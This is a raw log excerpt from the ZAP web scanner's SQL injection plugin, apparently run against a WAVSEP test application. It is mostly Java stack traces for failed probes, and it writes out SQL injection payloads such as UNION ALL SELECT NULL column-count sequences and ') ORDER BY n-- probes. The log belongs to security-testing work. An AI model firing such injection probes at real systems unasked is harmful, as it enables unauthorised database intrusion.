org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680348 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680349 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680350 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680352 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 4914-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') ORDER BY 4914-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680353 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680354 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680355 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680358 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680360 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680361 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680362 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680363 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680364 [ZAP-ActiveScanner-0] WARN 